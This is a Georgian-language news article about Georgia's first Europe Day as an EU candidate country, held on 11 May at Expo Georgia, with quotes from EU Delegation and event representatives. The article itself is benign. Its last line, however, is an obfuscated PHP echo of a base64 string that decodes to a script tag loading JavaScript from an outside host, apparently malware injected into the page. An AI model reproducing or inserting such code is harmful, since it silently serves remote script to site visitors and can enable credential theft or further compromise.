celsiusi
ავერსი საქკაბელი

 წელს პირველად, საქართველო ევროპის დღეს უკვე ევროკავშირის წევრობის კანდიდატის სტატუსით შეხვდება. ღონისძიება 11 მაისს, „ექსპო ჯორჯიაში“ 10:00-დან 20:00 საათამდე გაიმართება და მოიცავს არაერთ აქტივობას, რომელიც ყველა ასაკის ადამიანისთვის საინტერესო იქნება.

ამის შესახებ ინფორმაციას საქართველოში ევროკავშირის წარმომადგენლობა ავრცელებს.

მათივე ცნობით, ევროპის დღე 5 პავილიონსა და 6 სივრცეში ჩატარდება, რომელიც ევროკავშირის დაფინანსებით მიმდინარე პროექტებსა და ბენეფიციარებს გააერთიანებს.

„გასული წლიდან ევროპის დღეს „ექსპო ჯორჯიაში“ აღვნიშნავთ. წელს პირველად საქართველო ევროპის დღეს ხვდება, როგორც კანდიდატი ქვეყანა. ამიტომ ეს ღონისძიება უფრო მასშტაბური იქნება. მას ხუთი პავილიონი და ექვსი ზონა დაეთმობა, სადაც წარმოდგენილი იქნება ერთიანობის, მრავალფეროვნებისა და ევროკავშირისა და საქართველოს საერთო ღირებულებების ამსახველი ფაქტები. ადგილზე დილის 11 საათიდან საღამოს რვა საათამდე ვიქნებით. ჩვენ, ასევე, აღვნიშნავთ საქართველოსა და ევროკავშირს შორის არსებულ თანამშრომლობას და ხაზს გავუსვამთ ევროკავშირის მიერ საქართველოს კეთილდღეობაში შეტანილ წვლილს. ამჟამად ევროკავშირის მხარდაჭერით საქართველოში 130-ზე მეტი პროექტი ხორციელდება, რომელთა ნაწილსაც შეგიძლიათ სწორედ ევროპის დღეს გაეცნოთ. ევროკავშირსა და საქართველოს ბევრი საერთო ღირებულება აქვთ: ადამიანის უფლებები, შემწყნარებლობა, კანონის უზენაესობა თუ მრავალფეროვნება და წლევანდელი ღონისძიებაც ამ საერთო ღირებულებების აღნიშვნა იქნება. ამიტომ, მობრძანდით „ექსპო ჯორჯიაში“ ევროკავშირსა და საქართველოს შორის მზარდი ურთიერთობის აღსანიშნავად. მოუთმენლად ველი თქვენს ნახვას ამ მნიშვნელოვან ღონისძიებაზე“, - განაცხადა საქართველოში ევროკავშირის წარმომადგენლობის განვითარებისა და თანამშრომლობის განყოფილების ხელმძღვანელმა ნიკოლას სენდეროვიჩიმ.

ამასთან, როგორც "ევროპის დღის საუბრების" მოდერატორმა დავით გორგილაძემ აღნიშნა, ღონისძიებაზე შეკრებილი ადამიანები შეძლებენ ნახონ, როგორ ეხმარება ევროკავშირი, როგორც ყველაზე დიდი დონორი, საქართველოს სხვადასხვა მიმართულებით.

„წელს ევროპის დღესთან დაკავშირებით რამდენიმე საინტერესო და ახალ აქტივობას შემოგთავაზებთ. მესამე პავილიონში შეგეძლებათ შეხვდეთ მცირე და საშუალო ზომის საწარმოებს თბილისიდან და რეგიონებიდან, რომლებმაც ევროკავშირის მხარდაჭერით საკუთარი ბიზნესი განავითარეს ან გააფართოვეს. ეს კარგი მაგალითია იმისა, თუ რა წვლილი შეაქვს ევროკავშირს საქართველოს ეკონომიკაში. ევროკავშირი საქართველოს ყველაზე მსხვილი დონორია და ეს არის საქართველოს კეთილდღეობისა და სტაბილურობისადმი ჩვენი ურყევი ერთგულების დადასტურება. იმედი მაქვს, გვეწვევით და საკუთარი თვალით იხილავთ, თუ როგორ დაეხმარა ევროკავშირი ქართველებს და ქართულ ბიზნესს“, - განაცხადა დავით გორგილაძემ.

132
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");